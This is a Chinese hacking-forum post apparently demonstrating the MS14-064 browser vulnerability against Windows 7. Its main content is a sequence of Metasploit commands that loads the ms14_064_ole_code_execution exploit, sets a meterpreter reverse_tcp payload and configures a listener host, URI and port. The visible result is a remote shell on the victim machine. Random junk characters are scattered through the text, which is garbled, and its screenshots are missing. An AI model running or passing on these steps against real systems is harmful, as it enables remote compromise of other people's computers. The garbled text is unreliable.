找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1250|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, I, L1 c: @: {: Y1 W a+ P& j1 r8 Y( U 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示$ s. n7 }/ }$ F. _: A' h9 ]

4 s6 o& O( n/ ~ Q& a9 K

/ z4 D6 {7 y3 D 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 0 e7 ^0 ^0 C5 m1 W# ^9 k

" q8 J! [/ y$ R( B, U5 j7 n

. g2 E& [1 ?9 E9 n( u& d 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp# H% m; p, ^4 p. q/ U1 z

/ V Y( `( C: [) N L

$ ?/ h" w0 |3 s- M# F+ l% \, r             set AllowPowershellPrompt true* o- r* v! I1 k1 o7 O* r, {* r3 {

* E8 h% \4 S( z9 i3 r. v

, r8 _! _, w+ w             Set LHOST 192.168.0.109 1 p( J& ~ O- V/ R, f$ ?8 H

! L- m, K0 Q0 l& N8 a- w+ l

# f& Z0 }$ q" F$ q             set SRVHOST 192.168.0.1093 c' d' O, v. v' D! x% \

8 Q; U ~# m3 {0 _9 }

" t" t9 B; U/ \9 h8 x5 E             Set uripath share ( k( L3 ^( ]! b# B* o$ a

% {) s' e! c$ y9 s

7 P+ i3 q3 S0 d; a             Set srvport 80 4 U7 S- v: g E+ E

U5 E& N% d7 x1 ?- A5 \# a6 w; l

3 D7 M- x5 k: N, U$ b3 e  % v/ ?2 v" S0 q6 y

4 p* ^1 B- R! {3 Y3 H4 S6 W9 Q

- ?0 l* n4 U* M# F2 ^( B/ T' S  ( K+ ^! ^+ O |

6 \7 c) _$ M+ d; \

' q9 ~9 ]5 z8 s2 I" R  ! a" c" C* T! C ~/ V D

% l: J5 j1 [$ g, }' c8 P6 L

7 [7 O- }* O' t$ ~4 j   2 s0 @; m) r" e. B5 a. f* g

' x6 J1 O% y% ~2 r

7 K% X5 [: n; x. z1 d8 j   * {3 L% f. D7 J& @

% A# l j) U+ T" }$ p0 x" s

" w2 {& E, h2 r. u% f" B; } 下面我们来访问本地地址如图: $ o# j5 P8 k* L9 ?

) ~/ t: n; A0 T& D, f. B

" V+ Z( k2 z& t/ L0 j1 q- f   ( A6 M6 U5 t: ?- C

# h& n: H% _. j3 ^6 {

+ x; b$ x+ p5 ~; {) K   " p) {9 v) `. b% ~

; i7 U& S/ T2 s. q

7 B' `8 V( e" K `& Z# v% T5 Q- B ; C5 I+ L; W$ r8 w" P. Y9 N

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表